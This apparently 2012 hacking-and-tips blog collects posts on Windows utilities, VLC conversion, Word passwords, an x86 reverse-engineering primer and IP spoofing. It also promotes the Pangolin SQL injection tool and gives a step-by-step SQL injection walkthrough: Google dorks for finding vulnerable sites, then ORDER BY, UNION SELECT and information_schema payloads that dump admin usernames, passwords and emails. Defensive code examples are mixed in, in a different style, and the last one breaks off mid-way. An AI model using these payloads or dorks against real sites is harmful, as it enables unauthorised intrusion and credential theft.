Tuesday, January 31, 2012

Give your Windows a 3D Look



Hii Friends...I hope you all are fine. I hope my previous posts were beneficial for you. Well, today I am back with an amazing piece of software named T3Desk. It is a very interesting program which gives your windows a 3D look: it adds a third dimension to your windows and lets you make them transparent. It is a lightweight, unique application.





Using this software, your windows can be zoomed, flipped and moved in almost any way you want, so you can switch between them more easily. You can also configure your windows' 3D look, transparency effect and much more. This software works on almost all versions of Windows.

                                                 
Download

So, download this RAR file and give your Windows a 3D look.




Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Uninstall any program within a single click


Menu uninstaller


Hii Friends.....I hope you all are fine. Today I am back with a quite amazing trick that helps us uninstall any program or application with a single click. Usually we uninstall programs and applications by going to the Control Panel.

Well, this is not really a trick but a very handy piece of software that saves us time: it lets us uninstall any program straight from its shortcut. The software is called Menu Uninstaller, and it works on all Windows versions such as XP, Vista and Windows 7.

How this software works:
1) Download Menu Uninstaller and install it on your PC.
2) After installing it, right-click the shortcut of any program or application you want to uninstall and click Uninstall in the context menu. Just take a look at the screenshot:




                                              
 
Enjoy!!!!




Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

How to convert Videos using VLC Media Player

Hii Friends....I hope you all are fine!! As most of us know, VLC Player is an awesome media player that supports almost all video codecs. But most people are unaware of its amazing feature: this utility can also convert videos, which makes it a multi-purpose media player. It will convert videos easily into your desired format. If you do not have this amazing utility, download it from here.







Steps to Convert Videos using VLC Media Player:


  • Open VLC Media Player.
  • Now select Media Option.
  • Select Convert/Save option from the drop down menu.


  • Now a new pop-up window will appear. Click on the Add button under the file list to select the file that you want to convert.





  • You can also add subtitles, which will be hard-coded into the converted file. To add subtitles, check the Use a subtitle option. (Optional)
  • Now click on the Convert/Save button. You will see another window.
  • Select the Destination File and the Profile (conversion format).


  • Click on the Start button to begin the conversion.
  • The video conversion will now start and you will see something like streaming!!
Now you have learnt to Convert videos using VLC Media Player!!

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Trick to Password Protect Microsoft Word 2007 Files


Hii Friends...I hope you all are fine. Mainly we prefer Microsoft Word to create documents!! But sometimes we have documents saved on our computer that we want to keep other people from accessing, such as office reports, college projects, notes, etc. Microsoft Word 2007 has a useful security feature to password protect our private documents. So today I am going to share a very useful trick: "Trick to password protect Microsoft Word 2007 files"!!




Steps to Password Protect Microsoft Word 2007 files:


  • Open any document that you want to password protect.
  • Click on the Microsoft Office button present at the top left corner of the window.
  • Click on Save as option.


  • Now a new window will appear. Click on Tools option at the bottom of the window and select General Options.



  • Now again a new window will appear, titled General Options. At the top you will see two options: Password to open and Password to modify. You can use either one or both.

  • Password to open - this password is asked for every time someone tries to open the document. Anyone who wants to view the document needs to enter it.
    Password to modify - this password is asked for every time someone tries to modify the document, that is, to make any changes to it. Anyone who wants to save changes to the document needs to enter it.




  • Give your document a password of your wish and click on OK button.
  • That's all!!!


Now your Word document is protected from unwanted eyes!!!

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Automated SQL injection with pangolin- Tutorial+Application download



Pangolin is an automatic SQL injection penetration testing (pen-testing) tool for website managers and IT security analysts. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive back-end database management system fingerprint, retrieve the DBMS session user and database, enumerate users, password hashes, privileges and databases, dump entire or user-specific DBMS tables/columns, run their own SQL statements, read specific files on the file system and more.





Test many types of databases


Your web applications may use Access, DB2, Informix, Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2008, MySQL, Oracle, PostgreSQL, SQLite3 or Sybase.

Pangolin supports all of them.

Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.

DOWNLOAD PANGOLIN 3.2!!

DOWNLOAD TUTORIAL



Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

SpeedyFox: Firefox Speed Booster



Hey friends....I hope you all are fine. Are you pissed off with slow Firefox speed??? Then today I am going to provide you a very useful tool, SpeedyFox, which will help you get rid of slow Firefox speed. SpeedyFox is a small utility which compresses all your saved profile data and thereby greatly enhances your Firefox speed. It compresses the data that makes Firefox heavier and eats up its speed, making it faster and smoother.


Features of Speedyfox:-





  • It will boost your startup time by 3 times.

  • Boost your browsing speed.

  • Quick Operation with Cookies.


      SPEEDYFOX FREE DOWNLOAD FOR WINDOWS

  • After downloading SpeedyFox, just run it.
  • Check Run Firefox After Optimization, then click Speed up my Firefox. {Make sure that Firefox is closed}

  • When the optimization is done, the Firefox window will open and you will see a sudden increase in your browsing speed!! Enjoy!!!!!!

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

The basics of Computer Architecture for Reverse Engineering




Hello friends. I have been busy these days with some Metasploit stuff, so I was not able to bring my continuation material for reverse engineering and assembly. In my previous post I provided quick material for learning the basics of assembly language. The PDF is a useful handbook and will help you for quick reference. Now I will continue the tutorial to the next step. In the previous tutorial, Fast draft Assembly, I focused on assembly basics. Here I will throw some light on some more concepts which I found useful during my course of learning reverse engineering.



So in case you have missed my previous tutorial, please go back, download the PDF and read it once. It will give you a quick idea about assembly. Don't worry if you don't understand it completely. Assembly is too big a subject to learn in one go, so if you want to dig deeper you can refer to a good book. Here I will cover those things that you will need for learning reverse engineering.

So let's start with the second part.

Some basics about Computer Architecture

What the 'F' about x86 and x64?


Interesting question. x86 is a very old technology that started with the 8086 family of processors. It has since evolved into the x86-32 version, which is the most common, and its successor x86-64, more commonly known as x64.

The architecture was called x86 because the processor model numbers in that family all ended in 86, even though it is 32-bit (definitely not 86-bit!). x64 is a contraction of x86-64. For example, Core 2 Duo processors actually use a 64-bit version of the older x86 architecture, and they are backwards compatible: notice how 64-bit Windows can run 32-bit programs without any problem? The processors support this natively! x64 is just what people write when they are too lazy to write x86-64.


The fuzz about 32 bit and 64 bit


You must have heard your friends or colleagues shouting about this: "mine is 64 bit, yours is 32 bit". But what exactly does it mean? Again a good question (by me). Let's solve the puzzle today.
A register is a small amount of storage inside the CPU where it keeps the data it needs to access the quickest, for optimum performance. The bit designation refers to the width of the register, so a 64-bit register can hold more data than a 32-bit register, which in turn holds more than 16-bit and 8-bit registers. The more room the CPU's register set has, the more it can handle, especially in terms of addressing system memory.
The major difference lies in addressing system memory. A CPU with 32-bit registers can hold a ceiling of 2^32 (2 raised to the power of 32) addresses in a register, so it cannot address more than 4 GB of system memory (RAM). A 64-bit register, on the other hand, can hold 2^64 addresses.
Hope you got answers to some questions you might never have thought about but used frequently.



Understanding the CPU Registers

Assembly language is a low-level language, often simply called machine language, made up of machine instructions. It is specific to the processor architecture: for example, it is different for x86 than for SPARC. Assembly language consists of assembly instructions and CPU registers.

Registers are small pieces of storage inside the CPU that are used for holding temporary data. Some registers have specific functions; others are just used for general data storage. I am assuming that you are all using x86 machines. There are two kinds of processors, 32-bit and 64-bit. In a 32-bit processor each register can hold 32 bits of data; a 64-bit register can hold 64 bits. We will mostly focus on 32-bit machines in this tutorial.
Registers play a key role in the reverse engineering process, so an overview of registers is necessary. We will look at the general purpose registers which are most used in reverse engineering.

EAX - This is the accumulator register, which is used to store the results of calculations. The letter E stands for "extended"; I will explain another concept related to it later on in the tutorial.


EDX - The data register is an extension of the accumulator. It is most useful for storing data related to the accumulator's current calculation.

ECX - The count register is the universal loop counter. It functions similar to a variable that we use to set up our loop counter value.

EDI - EDI points to the location where the result of data operation is stored, or the destination index. Every loop must store its result somewhere, and the destination index points to that place. With a single-byte STOS instruction to write data out of the accumulator, this register makes data operations much more size-efficient.

ESI - In loops that process data, the source index holds the location of the input data stream. Like the destination index, ESI has a convenient one-byte instruction for loading data out of memory into the accumulator. So the ESI register is the source index for data operations and holds the location of the input data stream.

ESP - ESP is the sacred stack pointer. With the important PUSH, POP, CALL and RET instructions all depending on its value, there is never a good reason to use the stack pointer for anything else.

EBP - In functions that store parameters or variables on the stack, the base pointer holds the location of the current stack frame. In other situations, however, EBP is a free data-storage register.

EBX - In 16-bit mode, the base register was useful as a pointer. Now it is completely free for extra storage space.EBX is the only register that was not designed for anything specific. It can be used for extra storage.

The 'E' at the beginning of each register name stands for Extended. When a register is referred to by its extended name, it indicates that all 32 bits of the register are being addressed.  An interesting thing about registers is that they can be broken down into smaller subsets of themselves; the first sixteen bits of each register can be referenced by simply removing the 'E' from the name. For example, if you wanted to only manipulate the first sixteen bits of the EAX register, you would refer to it as the AX register. Additionally, registers AX through DX can be further broken down into two eight bit parts. So, if you wanted to manipulate only the first eight bits (bits 0-7) of the AX register, you would refer to the register as AL; if you wanted to manipulate the last eight bits (bits 8-15) of the AX register, you would refer to the register as AH ('L' standing for Low and 'H' standing for High).

Understanding Memory and Stacks



There are three main sections of memory:


1. Stack Section - Where the stack is located, stores local variables and function arguments.


2. Data Section - Where the heap is located, stores static and dynamic variables.


3. Code Section - Where the actual program instructions are located.


The stack section starts at the high memory addresses and grows downwards, towards the lower memory addresses; conversely, the data section (heap) starts at the lower memory addresses and grows upwards, towards the high memory addresses. Therefore, the stack and the heap grow towards each other as more variables are placed in each of those sections.





High Memory Addresses (0xFFFFFFFF)
---------------------- <---- Bottom of the stack
|                    |
|                    |   |
|       Stack        |   |  Stack grows down
|                    |   v
|                    |
|--------------------| <---- Top of the stack (ESP points here)
|                    |
|                    |
|                    |
|--------------------| <---- Top of the heap
|                    |
|                    |   ^
|       Heap         |   |  Heap grows up
|                    |   |
|                    |
|--------------------| <---- Bottom of the heap
|                    |
|   Instructions     |
|                    |
----------------------
Low Memory Addresses (0x00000000)





So now let us relate these concepts to assembly and look at how we can actually use them in generating machine code.
Let us go back to our previous post, in which we studied some concepts of assembly language. Assembly language is based on machine instructions, so proper knowledge of computer architecture is essential to understand the overall operation.
So let us now relate what we studied in the previous post and in this one, and look at some important assembly instructions.


Some Important Assembly instructions





Instruction   Example            Description
-----------   ----------------   ------------------------------------------------------------------
push          push eax           Pushes the value stored in EAX onto the stack
pop           pop eax            Pops a value off the stack and stores it in EAX
call          call 0x08abcdef    Calls the function located at 0x08abcdef
mov           mov eax,0x5        Moves the value 5 into the EAX register
sub           sub eax,0x4        Subtracts 4 from the value in the EAX register
add           add eax,0x1        Adds 1 to the value in the EAX register
inc           inc eax            Increases the value stored in EAX by one
dec           dec eax            Decreases the value stored in EAX by one
cmp           cmp eax,edx        Compares the values in EAX and EDX; if they are equal, sets the zero flag to 1
test          test eax,edx       Performs an AND on the values in EAX and EDX; if the result is zero, sets the zero flag to 1
jmp           jmp 0x08abcde      Jumps to the instruction located at 0x08abcde
jnz           jnz 0x08ffff01     Jumps to 0x08ffff01 if the zero flag is 0 (the last result was not zero)
jne           jne 0x08ffff01     Jumps to 0x08ffff01 if a comparison was not equal (the same instruction as jnz)
and           and eax,ebx        Performs a bitwise AND on the values in EAX and EBX; the result is saved in EAX
or            or eax,ebx         Performs a bitwise OR on the values in EAX and EBX; the result is saved in EAX
xor           xor eax,eax        Performs a bitwise XOR of EAX with itself; the result (zero) is saved in EAX, a common way to clear a register
leave         leave              Tears down the current stack frame before returning
ret           ret                Returns to the calling function
nop           nop                No operation (a 'do nothing' instruction)
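To tie the register descriptions above (EAX and its AX, AL and AH views) and the instruction table together, here is an added example that is not part of the original post: a tiny Python model of a 32-bit register file and of the instructions in the table. Memory is a dictionary, jump targets are instruction indices standing in for code addresses, and the three small programs inside it are constructed for the illustration.

```python
"""Added example (not from the original post): a tiny model of the 32-bit x86
register file and the instructions in the table above. Memory and the stack are
a constructed dictionary, and jump targets are instruction indices."""

MASK32 = 0xFFFFFFFF

# Sub-register views of EAX..EDX: name -> (full register, bit shift, bit width).
# AX is the low 16 bits of EAX, AL is bits 0-7 and AH is bits 8-15 (same for B, C, D).
SUBREGS = {}
for full in ("eax", "ebx", "ecx", "edx"):
    letter = full[1]
    SUBREGS[letter + "x"] = (full, 0, 16)
    SUBREGS[letter + "l"] = (full, 0, 8)
    SUBREGS[letter + "h"] = (full, 8, 8)

# Two-operand arithmetic/logic instructions from the table: dest = dest OP src.
ALU = {"add": lambda x, y: x + y, "sub": lambda x, y: x - y,
       "and": lambda x, y: x & y, "or": lambda x, y: x | y, "xor": lambda x, y: x ^ y}


class CPU:
    def __init__(self):
        self.regs = {r: 0 for r in ("eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp")}
        self.regs["esp"] = 0xFFFF0000   # the stack sits at high addresses and grows down
        self.zf = 0                     # zero flag
        self.mem = {}                   # address -> 32-bit value (constructed stack memory)

    def get(self, operand):
        """Read a full register, a sub-register view, or an immediate such as 0x5."""
        if operand in self.regs:
            return self.regs[operand]
        if operand in SUBREGS:
            full, shift, width = SUBREGS[operand]
            return (self.regs[full] >> shift) & ((1 << width) - 1)
        return int(operand, 0) & MASK32

    def set(self, reg, value):
        """Write a register; writing AL, AH or AX touches only its own bits of the E-register."""
        if reg in self.regs:
            self.regs[reg] = value & MASK32
            return
        full, shift, width = SUBREGS[reg]
        mask = ((1 << width) - 1) << shift
        self.regs[full] = (self.regs[full] & (MASK32 ^ mask)) | ((value << shift) & mask)

    def _result(self, reg, value):
        """Store an arithmetic/logic result and update ZF, as real x86 does."""
        self.set(reg, value)
        self.zf = int((value & MASK32) == 0)

    def step(self, pc, program):
        """Execute program[pc] and return the index of the next instruction."""
        parts = program[pc].replace(",", " ").split()
        op, a = parts[0], parts[1:]
        if op == "mov":
            self.set(a[0], self.get(a[1]))
        elif op in ALU:
            self._result(a[0], ALU[op](self.get(a[0]), self.get(a[1])))
        elif op in ("inc", "dec"):
            self._result(a[0], self.get(a[0]) + (1 if op == "inc" else -1))
        elif op == "cmp":      # subtraction whose result is discarded; only ZF is kept
            self.zf = int(((self.get(a[0]) - self.get(a[1])) & MASK32) == 0)
        elif op == "test":     # AND whose result is discarded; only ZF is kept
            self.zf = int((self.get(a[0]) & self.get(a[1])) == 0)
        elif op == "push":     # ESP moves to a lower address, then the value is stored there
            self.regs["esp"] = (self.regs["esp"] - 4) & MASK32
            self.mem[self.regs["esp"]] = self.get(a[0])
        elif op == "pop":      # the value is loaded, then ESP moves back up
            self.set(a[0], self.mem[self.regs["esp"]])
            self.regs["esp"] = (self.regs["esp"] + 4) & MASK32
        elif op == "jmp":
            return int(a[0])
        elif op in ("jnz", "jne"):   # taken only when the zero flag is 0
            return int(a[0]) if self.zf == 0 else pc + 1
        elif op != "nop":
            raise ValueError("unsupported instruction: " + op)
        return pc + 1

    def run(self, program):
        pc = 0
        while 0 <= pc < len(program):
            pc = self.step(pc, program)
        return self


def sum_loop():
    # ECX as the loop counter: adds 5+4+3+2+1 into EAX, jumping back to index 2 while ECX != 0.
    cpu = CPU().run(["mov eax, 0", "mov ecx, 5", "add eax, ecx", "dec ecx", "jnz 2"])
    return cpu.regs["eax"], cpu.regs["ecx"], cpu.zf


def subregister_views():
    # AL, AH and AX are windows onto EAX, not separate storage.
    cpu = CPU()
    cpu.set("eax", 0x12345678)
    cpu.set("al", 0xFF)                       # only bits 0-7 of EAX change
    return cpu.regs["eax"], cpu.get("ax"), cpu.get("ah")


def push_pop_roundtrip():
    # PUSH lowers ESP by 4; POP restores both the saved value and ESP.
    cpu = CPU()
    cpu.set("eax", 0xDEADBEEF)
    esp_before = cpu.regs["esp"]
    cpu.run(["push eax", "xor eax, eax", "pop eax"])   # xor eax,eax clears EAX in between
    return cpu.regs["eax"], cpu.regs["esp"] == esp_before
```

Two things the model makes visible that the table only states: `jnz` is taken when the zero flag is clear, which is what makes the `dec ecx` / `jnz` pair loop until the counter reaches zero, and `push` moves ESP to a lower address before storing, which is the "stack grows down" picture from the memory diagram. Real x86 also updates the flags on every arithmetic and logic instruction, which is why `dec` alone is enough to drive the loop.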

If you have understood the things we have learned so far then you are halfway through. The rest depends on how much you explore yourself. All you need is a debugger. I prefer using OllyDbg, but you can choose any debugger you are comfortable with. Try opening any exe file in the debugger and analysing the code. You will find several things you have learned here, and it will help you understand them in detail. In my next post I will show you how we can reverse engineer different software using the knowledge we have learned so far.

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

Basic SQL injection tutorial - Readers Choice



Hello readers. This has been a very busy week for me, but I had to take out time for my blog. First of all I would like to thank you all for visiting my blog frequently and posting your feedback and requests. In the past month Hackerszone has seen an enormous growth in traffic. Today I am writing on SQL injection. This is my third tutorial on SQL injection, but there is heavy demand for it again and again. I have kept it a bit above basic level, as you can go around and find lots of material for the basics. Here I have compiled the major techniques in a single tutorial. So let's start.


What is SQL Injection?

SQL Injection (Or SQLi for short) is a method of code injection into Structured Query Language (SQL) databases. It exploits a security issue where a user's input is not correctly filtered, usually due to poorly coded query language interpreters.
Consider this code:
Code:
statement = "SELECT * FROM `members` WHERE `user` = '" + user + "';"

The above statement selects the specified "user" from the "members" table. Do you see any problems with this? Consider the following input as a username:
Code:
' or 'x' = 'x

When the database tries to pull up records of that username, this is the resulting query:
Code:
SELECT * FROM `members` WHERE `user` = '' OR 'x'='x';

Now, as you can see, the username is actually completely blank contained within the '', but the following OR statement will return true, as 'x' always = 'x'. Due to this problem of incorrectly filtering database queries, the hacker can input his/her own malicious code.
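The same concatenation, placed beside the hardened form a defender should insist on, as an added example that is not taken from the post. Python's built-in sqlite3 stands in for the site's database, and the three-row `members` table is constructed for the illustration.

```python
import sqlite3

# Constructed stand-in for the post's `members` table (three rows).
MEMBERS = [("alice", "alice@example.com"), ("bob", "bob@example.com"), ("carol", "carol@example.com")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (user TEXT, email TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", MEMBERS)
    return conn


def lookup_vulnerable(conn, user):
    """The pattern from the post: the user's input is spliced into the SQL text,
    so a quote in the input ends the string literal and the rest becomes SQL."""
    statement = "SELECT * FROM `members` WHERE `user` = '" + user + "';"
    return conn.execute(statement).fetchall()


def lookup_parameterized(conn, user):
    """Hardened form: the value travels separately from the SQL text as a bound
    parameter, so it is only ever compared as data and cannot change the query."""
    return conn.execute("SELECT * FROM members WHERE user = ?", (user,)).fetchall()


def compare(user):
    """Return (rows from the vulnerable query, rows from the parameterized query)."""
    conn = make_db()
    return len(lookup_vulnerable(conn, user)), len(lookup_parameterized(conn, user))
```

With a normal username both lookups return the same single row. With the `' or 'x' = 'x` input from the post, the concatenated query returns every row in the table, while the parameterized query looks for a user literally named `' or 'x' = 'x` and returns nothing. Bound parameters, not input filtering, are what close this class of bug.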

The above was just one example of SQL Injection, what we will be learning in this tutorial, is integer based SQL Injection using the ORDER BY and UNION SELECT queries.

Google Dorks?

Before we get started on the rest of the tutorial, you will need to know what a Google dork is, and no, it's not the kind of dork you are thinking of!
A google dork is a small search phrase done by the hacker to find sites vulnerable to SQL Injection. Usually this search term will be very small and it will look for specific lines of text within the webpage or in the URL. I've included some here as a start:
Code:
inurl:trainers.php?id=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:Pageid=
inurl:games.php?id=
inurl:newsDetail.php?id=
inurl:staff_id=
inurl:news_view.php?id=
inurl:humor.php?id=
inurl:pages.php?id=
inurl:view.php?id=
inurl:detail.php?ID=
inurl:publications.php?id=
inurl:Productinfo.php?id=
inurl:releases.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:section.php?id=
inurl:page.php?id=
inurl:newsid=
inurl:news_display.php?getid=


Is my site vulnerable?

Now, after you have found a site using a Google dork, you need to check if it is vulnerable to integer-based SQL injection. To do this is simple: all you need to do is add an apostrophe ( ' ) to the end of the URL. You should get an error similar to this back:
Code:
Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1

If you get this error, it usually means your site is vulnerable!

ORDER BY x--

Our first step to accessing the database will be to find how many columns the query has. To do this we use the ORDER BY x-- query (x being an integer). Example:
Code:
www.examplesite.com/index.php?id=5 ORDER BY 1--

We want to keep increasing "x" until we get back an error. So why? Imagine our database has 4 columns, if we try to order by the 5th, it can't access it. It doesn't exist. So if we get an error on ORDER BY 5--, it means we have 4 columns. Here is an example:
Code:
www.examplesite.com/index.php?id=5 ORDER BY 1-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 2-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 3-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 4-- (No error)
www.examplesite.com/index.php?id=5 ORDER BY 5-- (Error)

We can now determine the site has 4 columns.

UNION SELECT

We use the UNION SELECT statement to combine the results of multiple queries in our SQLi. To test if it works, go to the site's normal URL and write "UNION SELECT 1,2,3,4--" (without quotes) after it. In our example we use "1,2,3,4--", but on other sites you will usually have a different number of columns. Example: on a site with 5 columns it would be "union select 1,2,3,4,5--".

Code:
www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,3,4--

You have probably noticed several numbers have appeared on the page. This is the vulnerable columns we are going to use for our SQLi. In our example, column 3 is vulnerable. You have also probably noticed I have replaced id=5 with id=-5. The reason for this is that sometimes our query on the page will be covered up by text or images, making it hard to find, or only viewable in the source code. To bypass this, we try to get the site to call a non-existing page (id=-5, there are no pages with the ID of -5). Usually this will result in the page being cleared of all text and images. If it doesn't work, just remove the - and continue on as normal.

VERSION()

This will be one of the easier things to do and understand, the name of the query itself is self explanatory. After we have tested UNION SELECT (and it works) we simply input VERSION() into one of the vulnerable columns in our URL, example:
Code:
http://www.examplesite.com/index.php?id=-5 union select 1,2,VERSION(),4--

We had 4 columns in our example and the vulnerable column was number 3, so we have replaced the number 3 with VERSION(). You should now see the version of the database server. This tutorial only deals with integer-based injection on MySQL version 5 and above.

If our target has a version over 5, continue reading, if not, you need to find a new target or read a different tutorial.

Table_name

Now we are going to get into the tables. This is where all the information you are looking for will be kept, but first, we need to find the table names. To do so, replace VERSION() with group_concat(table_name). Then after your last column number, add "from information_schema.tables--". Example:
Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(table_name),4 from information_schema.tables--

What this code is doing is combining the queries of columns 1, 2, 3 and 4. In column 3 it is selecting all possible table names, which are taken from information_schema.tables. You should now see a list of all table names on the screen.

Column_name

To find the column names we do the same thing, but replace tables with columns and include which table to get the column names from. What we want is a table which seems like it would include some good information; for our example, we are going to say we found the table "admin". Example:

Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin'--

Here, as before, we are combining the queries of 1,2,3 and 4. In column 3 we are requesting all of the column names from information_schema.columns, but this time only from where the table_name is equal to "admin". Otherwise we would get the name of every column in the database, and this would just take much longer to go through.

Magic Quotes?

One common problem when completing the Column_name stage is that people still receive an error. This can be frustrating to those new to SQL injection, so I'm going to cover the reason for this.

The problem here is that the admin of the site has attempted to outsmart you by using "Magic Quotes", which escapes the quote characters in your input so that a quoted table name no longer works. The table name has to be supplied as a hex literal instead. You can convert your table name to hex by going here: http://www.swingnote.com/tools/texttohex.php

Our query will now look like this:
Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x61646d696e--

You have most likely noticed that if you convert our plaintext column name into hex, the 0x isn't shown. The 0x is something we put in ourselves, which tells the site that the following text is going to be in hex.

Extracting Data

To finish off, we need to extract the data from the columns we have chosen. Once we have found the column names, we can use them in our group_concat() query to get exactly what we have been looking for. In our example, we will say we found the column names "username", "password" and "email".
Code:
http://www.examplesite.com/index.php?id=-5 UNION SELECT 1,2,group_concat(username,0x3a,password,0x3a,email) from admin--

This query extracts the usernames, passwords and emails from the admin table. Remember I told you what 0x does? You will notice it again in our last query: 0x3a is the hex code for a colon ( : ). It is used so we can separate our results more easily; by doing this we get the following returned:

Code:
ExUser1:ExPass1:ExEmail1
ExUser2:ExPass2:ExEmail2
ExUser3:ExPass3:ExEmail3
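From the defender's side, every stage of this walkthrough (the lone apostrophe, the ORDER BY counting, the UNION SELECT with information_schema) leaves a recognisable trail in the web server's access log. The following added example, not from the post, runs a small set of detection rules over constructed access-log lines in the common log format; the client addresses, timestamps and rule names are all made up for the illustration, and the request targets reuse the URL shapes shown in the tutorial.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (common log format); addresses and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2012:10:01:02 +0000] "GET /index.php?id=5 HTTP/1.1" 200 5120
10.0.0.5 - - [31/Jan/2012:10:01:09 +0000] "GET /index.php?id=5' HTTP/1.1" 500 812
10.0.0.5 - - [31/Jan/2012:10:01:15 +0000] "GET /index.php?id=5%20ORDER%20BY%205-- HTTP/1.1" 500 812
10.0.0.5 - - [31/Jan/2012:10:01:40 +0000] "GET /index.php?id=-5%20UNION%20SELECT%201,2,group_concat(table_name),4%20from%20information_schema.tables-- HTTP/1.1" 200 7003
10.0.0.9 - - [31/Jan/2012:10:02:00 +0000] "GET /news_view.php?id=12 HTTP/1.1" 200 4400
10.0.0.9 - - [31/Jan/2012:10:02:03 +0000] "GET /search.php?q=order%20form HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Detection rules, each applied to a decoded query-string value.
RULES = [
    ("union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    ("schema-enumeration", re.compile(r"information_schema|group_concat\s*\(", re.I)),
    ("quote-after-number", re.compile(r"^-?\d+'\s*$")),   # the lone apostrophe test
]


def analyse_line(line):
    """Return (client ip, parameter name, matched rule names) if a query-string
    value trips a rule, else None. Values are decoded a second time so a doubly
    percent-encoded payload is still inspected in plain form."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote_plus(value)
        hits = [rule for rule, rx in RULES if rx.search(value)]
        if hits:
            return m.group("ip"), name, hits
    return None


def scan(log_text):
    """Run analyse_line over every line and keep the suspicious ones."""
    return [hit for hit in (analyse_line(ln) for ln in log_text.splitlines()) if hit]


def probes_per_client(log_text):
    """Count suspicious requests per client address, the figure an analyst alerts on."""
    counts = {}
    for ip, _param, _hits in scan(log_text):
        counts[ip] = counts.get(ip, 0) + 1
    return counts
```

The rules are deliberately narrow so that an ordinary search for "order form" is not flagged; what makes the sequence stand out is the same client moving from a syntax-error probe to column counting to schema enumeration within a minute, which `probes_per_client` surfaces. The 500 responses on the probe lines are the other tell: a well-behaved application should return a generic error page rather than the database's own message shown earlier in the tutorial.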

Feel Free to Ask Anything.
Hope you like it.
Enjoy and don’t forget to comment.

IP Spoofing - The Untraceable HACK!



The term IP spoofing is a combination of two different words IP + Spoofing .

IP refers to the connectionless protocol which is responsible for routing data packets over the network. Since it is connectionless, the sender of a message receives no acknowledgement that it has arrived without any flaw at the receiver's end. The term spoofing means that the attacker sends a message to a computer indicating that it has come from a trusted source. Hence IP spoofing is the concept of spoofing the identity of a trusted source (the victim) in order to gain access at the same privilege level as the victim.

Brief History of IP spoofing

In the April 1989 article entitled "Security Problems in the TCP/IP Protocol Suite", author S. M. Bellovin of AT&T Bell Labs was among the first to identify IP spoofing as a real risk to computer networks. Bellovin describes how Robert Morris, creator of the now infamous Internet Worm, figured out how TCP created sequence numbers and forged a TCP packet sequence. This TCP packet included the destination address of his "victim" and, using an IP spoofing attack, Morris was able to obtain root access to his targeted system without a user ID or password.

A common misconception is that "IP spoofing" can be used to hide your IP address while surfing the Internet, chatting on-line, sending e-mail, and so forth. This is generally not true. Forging the source IP address causes the responses to be misdirected, meaning you cannot create a normal network connection. However, IP spoofing is an integral part of many network attacks that do not need to see responses (blind spoofing).



Detailed Overview of the attack

The heart of network connectivity over the Internet is the TCP/IP protocol suite, which collectively describes how a connection is established and how data is transmitted over the network. Here I will briefly describe the aspects of IP and TCP that are exploited in order to perform the attack.

Here are the models of TCP and IP headers.




Examining the IP header, we can see that the first 12 bytes (or the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contain the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses, specifically the "source address" field. It's important to note that each datagram is sent independently of all others due to the stateless nature of IP. Keep this fact in mind as we examine TCP in the next section.

As you can see above, a TCP header is very different from an IP header. We are concerned with the first 12 bytes of the TCP packet, which contain port and sequencing information. Much like an IP datagram, TCP packets can be manipulated using software. The source and destination ports normally depend on the network application in use (for example, HTTP via port 80). What's important for our understanding of spoofing are the sequence and acknowledgement numbers. The data contained in these fields ensures packet delivery by determining whether or not a packet needs to be resent. The sequence number is the number of the first byte in the current packet, relative to the data stream. The acknowledgement number, in turn, contains the value of the next expected sequence number in the stream. This relationship confirms, on both ends, that the proper packets were received. It's quite different from IP, since transaction state is closely monitored.
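As an added example that is not from the post, here is a parser for the two headers just described, run over a constructed 40-byte packet (a 20-byte IPv4 header followed by a 20-byte TCP header, no options, no payload; the checksum fields are left as zero rather than computed). It pulls the source and destination addresses out of bytes 12-19 of the IP header and the ports, sequence number and acknowledgement number out of the first 12 bytes of the TCP header, which is the view a defender needs when checking captured traffic for forged sources.

```python
import struct

# Constructed 40-byte packet: a 20-byte IPv4 header followed by a 20-byte TCP header,
# no options and no payload. The checksum fields are left as zero, not computed.
SAMPLE_PACKET = bytes.fromhex(
    "4500 0028 1c46 4000 4006 0000 c0a8 0001 c0a8 0002 "   # IPv4: 192.168.0.1 -> 192.168.0.2
    "d43a 0050 0000 1234 0000 5678 5010 ffff 0000 0000"    # TCP: port 54330 -> 80, ACK set
)

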